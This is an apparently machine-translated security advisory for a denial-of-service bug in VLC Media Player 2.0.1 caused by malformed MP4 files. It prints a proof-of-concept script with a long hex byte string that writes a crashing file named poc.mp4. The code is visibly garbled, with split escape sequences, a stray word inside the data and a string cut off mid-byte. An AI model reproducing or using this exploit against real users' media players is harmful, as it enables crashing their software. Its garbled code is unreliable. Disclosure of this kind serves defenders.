Release date: 2012-04-20
Updated on: 2012-04-23
Affected Systems:
VideoLAN VLC Media Player 2.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53169
VLC Media Player is a multimedia Player named VideoLAN client.
When VLC Media playeris processing malformed. MP4 files, there is a denial of service vulnerability in implementation. Attackers can exploit this vulnerability to cause the affected applications to crash.
<* Source: Senator
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Senator () provides the following test methods:
Data =
"\ X00 \ x00 \ x00 \ x1C \ x66 \ x74 \ x79 \ x6D \ x6D \ x34 \ x32 \ x00 \ x00 \ x00 \ x00 \ x69 \ x73 \ x6F \ x6D \ x61 \ x76 \ x63 \ x31 \ x6D \ cross \ x34 \ x32 \ x00 \ x01 \ x19 \ x28 \ x6D \ x6F \ x6F \ x76 \ x00 \ x00 \ x00 \ x00 \ x6C \ x6D \ x76 \ x68 \ x64 \ x00 \ x00 \ x00 \ x00 \ xC7 \ x21 \ xFC \ x5B \ xC7 \ x21 \ xFC \ x5B \ x00 \ x00 \ x02 \ x58 \ x00 \ x02 \ x22 \ xA8 \ x00 \ x01 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x40 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x03 \ x00 \ x00 \ x00 \ x15 \ x69 \ x6F \ x64 \ x73 \ x00 \ x00 \ x00 \ x00 \ x00 \ x10 \ x07 \ x00 \ x4F \ xFF \ x29 \ x15 \ xFF \ x00 \ x00 \ xA5 \ xE5 \ x74 \ x72 \ x61 \ x6B \ x00 \ x00 \ x00 \ x5C \ x74 \ x6B \ x68 \ x64 \ x00 \ x00 \ x00 \ x01 \ xC7 \ x21 \ xFC \ x5B \ xC7 \ x21 \ xFC \ x5B \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x02 \ x22 \ x9C \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x40 \ x00 \ x00 \ x00 \ xFF \ xFF \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ xA5 \ x81 \ x6D \ x64 \ x69 \ x61 \ x00 \ x00 \ x00 \ x20 \ x6D \ x64 \ x68 \ x64 \ x00 \ x00 \ x00 \ x00 \ xC7 \ x21 \ xFC \ x5B \ xC7 \ x21 \ xFC \ x5B \ x00 \ x00 \ x00 \ x00 \ x00 \ x9C \ xF0 \ x00 \ x55 \ xC4 \ x00 \ x00 \ x00 \ x00 \ x00 \ x42 \ x68 \ x64 \ x6C \ x72 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x73 \ x6F \ x75 \ x6E \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x28 \ x43 \ x29 \ x20 \ x32 \ x30 \ x30 \ x37 \ x20 \ x47 \ x6F \ x6F \ x67 \ x6C \ x65 \ x20 \ x49 \ x6E \ x63 \ x2E \ x20 \ x76 \ x30 \ x38 \ x2E \ x31 \ x33 \ x2E \ x32 \ x30 \ x30 \ x37 \ x2E \ x00 \ x00 \ x00 \ xA5 \ x17 \ x6D \ x69 \ x6E \ x66 \ x00 \ x00 \ x00 \ x10 \ x73 \ x6D \ x68 \ x64 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x24 \ x64 \ x69 \ x6E \ x66 \ x00 \ x00 \ x00 \ x1C \ x64 \ x72 \ x65 \ x66 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x0C \ x75 \ x72 \ x6C \ x20 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ xA4 \ xDB \ x73 \ x74 \ x62 \ x6C \ x00 \ x00 \ x00 \ x5B \ x73 \ x74 \ x73 \ x64 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x4B \ x6D \ x34 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x02 \ x00 \ x10 \ x00 \ x00 \ x00 \ x00 \ xAC \ x44 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x27 \ x65 \ x73 \ x64 \ x73 \ x00 \ x00 \ x00 \ x00 \ x03 \ x19 \ x00 \ x00 \ x00 \ x04 \ x11 \ x40 \ x15 \ x00 \ x01 \ xE6 \ x00 \ x02 \ x2D \ x38 \ x00 \ x01 \ xCD \ x28 \ x05 \ x02 \ x12 \ x10 \ x06 \ x01 \ x02 \ x00 \ x00 \ x00 \ x18 \ x73 \ x74 \ x74 \ x73 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x27 \ x3C \ x00 \ x00 \ x04 \ x00 \ x00 \ x00 \ x00 \ x28 \ x73 \ x74 \ x73 \ x63 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x02 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x16 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x01 \ xC9 \ x00 \ x00 \ x00 \ x0C \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x9D \ x04 \ x73 \ x74 \ x73 \ x7A \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x27 \ x3C \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x00 \ x09 \ x00 \ x00 \ x01 \ x6D \ x00 \ x00 \ x01 \ x5F \ x00 \ x00 \ x01 \ x8E \ x00 \ x00 \ x01 \ x76 \ x00 \ x00 \ x01 \ x7B \ x00 \ x00 \ x01 \ x72 \ x00 \ x00 \ x01 \ x76 \ x00 \ x00 \ x01 \ x7E \ x00 \ x00 \ x01 \ x75 \ x00 \ x00 \ x01 \ x7B \ x00 \ x00 \ x01 \ x74 \ x00 \ x00 \ x01 \ x75 \ x00 \ x00 \ x01 \ x71 \ x00 \ x00 \ x01 \ x6B \ x00 \ x00 \ x01 \ x61 \ x00 \ x00 \ x01 \ x63 \ x00 \ x00 \ x01 \ x6D \ x00 \ x00 \ x01 \ x5E \ x00 \ x00 \ x01 \ x66 \ x00 \ x00 \ x01 \ x5D \ x00 \ x00 \ x01 \ x55 \ x00 \ x00 \ x01 \ x5D \ x00 \ x00 \ x01 \ x66 \ x00 \ x00 \ x01 \ x66 \ x00 \ x00 \ x01 \ x60 \ x00 \ x00 \ x01 \ x59 \ x00 \ x00 \ x01 \ x56 \ x00 \ x00 \ x01 \ x54 \ x00 \ x00 \ x01 \ x68 \ x00 \ x00 \ x01 \ x4B \ x00 \ x00 \ x01 \ x4D \ x00 \ x00 \ x01 \ x51 \ x00 \ x00 \ x01 \ x4C \ x00 \ x00 \ x01 \ x43 \ x00 \ x00 \ x01 \ x40 \ x00 \ x00 \ x01 \ x3D \ x00 \ x00 \ x01 \ x2E \ x00 \ x00 \ x01 \ x19 \ x00 \ x00 \ x01 \ x12 \ x00 \ x00 \ x01 \ x03 \ x00 \ x00 \ x01 \ x1D \ x00 \ x00 \ x01 \ x1A \ x00 \ x00 \ x01 \ x16 \ x00 \ x00 \ x01 \ x21 \ x00 \ x00 \ x01 \ x08 \ x00 \ x00 \ x01 \ x18 \ x00 \ x00 \ x01 \ x1A \ x00 \ x00 \ x01 \ x09 \ x00 \ x00 \ x00 \ xFF \ x00 \ x00 \ x00 \ xFF \ x00 \ x00 \ x01 \ x01 \ x00 \ x00 \ x00 \ xFD \ x00 \ x00 \ x00 \ x00 \ xF7 \ x00 \ x00 \ x00 \ xF5 \ x00 \ x01 \ x15 \ x00 \ x00 \ x01 \ x1A \ x00 \ x00 \ x01 \ x17 \ x00 \ x00 \ x01 \ x09 \ x00 \ x00 \ x01 \ x0D \ x00 \ x00 \ x01 \ x11 \ x00 \ x00 \ x01 \ x0F \ x00 \ x00 \ x01 \ x14 \ x00 \ x00 \ x01 \ x09 \ x00 \ x00 \ x01 \ x19 \ x00 \ x00 \ x01 \ x03 \ x00 \ x00 \ x01 \ x0E \ x00 \ x00 \ x00 \ xF8 \ x00 \ x00 \ x00 \ x00 \ xEF \ x00 \ x00 \ x01 \ x0E \ x00 \ x00 \ x01 \ x10 \ x00 \ x00 \ x01 \ x12 \ x00 \ x00 \ x01 \ x0B \ x00 \ x00 \ x01 \ x0D \ x00 \ x00 \ x01 \ x0C \ x00 \ x00 \ x01 \ x0C \ x00 \ x00 \ x01 \ x11 \ x00 \ x00 \ x01 \ x07 \ x00 \ x00 \ x01 \ x0A \ x00 \ x00 \ x01 \ x08 \ x00 \ x00 \ x01 \ x08 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x01 \ x0D \ x00 \ x00 \ x01 \ x09 \ x00 \ x00 \ x01 \ x01 \ x00 \ x00 \ x00 \ xFD \ x00 \ x00 \ x01 \ x01 \ x00 \ x00 \ x00 \ xFF \ x00 \ x00 \ x01 \ x05 \ x00 \ x00 \ x01 \ x01 \ x00 \ x00 \ x01 \ x02 \ x00 \ x00 \ x01 \ x09 \ x00 \ x00 \ x00 \ xFC \ x00 \ x00 \ x00 \ xFE \ x00 \ x00 \ x00 \ xFD \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x01 \ x03 \ x00 \ x
Avi
= Open('poc.mp4 ', 'wb + ')
Avi. write (Data)
Avi. close ()
Print
"[-] MP4 file generated"
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
VideoLAN
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.videolan.org/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
